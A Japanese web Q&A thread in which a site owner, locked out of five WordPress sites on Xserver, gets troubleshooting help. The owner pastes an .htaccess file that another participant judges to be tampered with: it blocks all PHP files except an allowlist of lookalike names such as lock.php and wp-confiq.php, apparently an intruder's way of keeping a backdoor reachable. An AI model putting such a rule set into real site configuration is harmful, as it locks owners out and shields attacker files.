Xサーバ上で構築しているWordpressにログインできなくなったのですが、以下の同じような事象になった方はいないでしょうか?
【1】困っていることや起きている問題についてできるだけ具体的に記載してください
・WordpressでSiteGardのプラグイン導入してログインのURLを変更していたのですが、「ページが見つかりません」というエラーとなります。
・7/17まではログインできていてコンテンツをアップしていました。ログインのURLは変更していません。
・それでXサーバ上にWEBサイトがデモ用含めて5個ほどあるのですが全て同じ状態です。
・また、Xサーバのアクセス制限の機能でベーシック認証をかけていたフォルダがあったのですが全て、アクセス制限機能がOFFになっていました。
【2】何をしようとしていたときに起きましたか
ログインURLにアクセスするとき
【3】試したことがあれば書いてください
ネットでSiteGardのログインURLが不明になった時の、対処でファイルマネージャでSiteGardのディレクトリ名を変更して強制に無効化し、WordPressの初期値のドメイン/wp-admin/でアクセスすると「403 Forbidden」エラーとなります。
【4】ご利用環境(わかる範囲でOK)
- 利用端末:PC
- OS:Windows11
- ブラウザ:Chrome
まずは、プラグインSiteGuardが書き込んだ「.htaccess」内のReWriteRuleを削除しませんか?
■手順
ファイルマネージャーで見た時に、サイト名の下の「public_html」配下に「.htaccess」というファイルがあると思います。
そのファイルを選択して「編集」で開き、以下の行を全て削除して保存してください。
(削除する前に、「.htaccess」の内容(全行)はメモ帳にでもコピーしてバックアップしましょう)
#==== SITEGUARD_RENAME_LOGIN_SETTINGS_START
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /bringval.com/
RewriteRule ^wp-signup\.php 404-siteguard [L]
RewriteRule ^wp-activate\.php 404-siteguard [L]
RewriteRule ^login_XXXX(.*)$ wp-login.php$1 [L]
</IfModule>
#==== SITEGUARD_RENAME_LOGIN_SETTINGS_END
「#==== SITEGUARD_RENAME_LOGIN_SETTINGS_START」から、
「#==== SITEGUARD_RENAME_LOGIN_SETTINGS_END」までを削除。
要確認)
wp-login.php$1 [L]の左の文字列(login_XXXXの部分)が変更したURLとなりますが、間違ったURLでアクセスしていないか念のため確認してください。
うまくいけば、以下の標準ログインURLにアクセスするとログイン画面が表示されると思います。
https://ドメイン名/wp-admin/ または、 https://ドメイン名/wp-login.php
それでもログインできない場合は、エックスサーバーのリカバリーを試してください。
「ログインできなくなったWordPressの復旧」になるでしょうか。
よろしくお願いします。
アドバイス有難うございます。
.htaccessには、何故かSITEGUARDがないんです。以下がファイルです。
・<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|PHP5|Php5|PHp5|pHp5|pHP5|phP5|PhP5|php7|PHP7|Php7|PHp7|pHp7|pHP7|phP7|PhP7|php8|PHP8|Php8|PHp8|pHp8|pHP8|phP8|PhP8|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|wp-login.php|wp-crom.php|header.php|wp-confiq.php|lock.php|wp.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>
Xseverの自動復元機能で昨日の13時に復元を実行したのですが、まだ終わらないです。(笑)
それでWEB診断したらPHPのエラーが出ているようなのと、不正アクセスの可能性ありということでちょっとサポートに問い合わせました。
自分が管理している5サイト全部同じ状態になりましたので、自動で何かが変更されたのだと思います。(怖い)
最近、自分では設定変更等してないので。。
プラグインの自動更新とかは設定していたのでその関係かもしれません。
PHPのバージョンのミスマッチあたりを疑っています。
何れにしろ、手に負えないところがありますのでサポートの回答を待ちたいと思います。
ご親切にアドバイス有難うございます。
進展がありましたら、こちらに書き込みます。
こんな.htaccess見たことないので、書き替えられてる感じですね。
lock.phpなど怪しげなファイル名が書かれているので、バックドア(?)の類ではないかなと。
不正アクセスの可能性がかなり高いので、自動復元の完了を待つしかないですね。
(全サイト復元しているから時間がかかってるんでしょうか)
返信、有難うございます。
ファイルマネージャで見ると書き換えらています。
サポートに連絡して連絡待ちです。
7/21頃の怪しいフォルダがありました。
SiteGuardも入れてXseverのWAFも有効にしていたのですが。。
FTPからの侵入経路を怪しんでいます。
何れにしろ、手に負えないところがあるのでサポートからの連絡待ちです。
質問・回答いただきありがとうございました。
■質問者様へ
質問が解決した際には、回答者の方へお礼をお伝えいただくとともに、質問のステータスを「解決済み」に変更してください。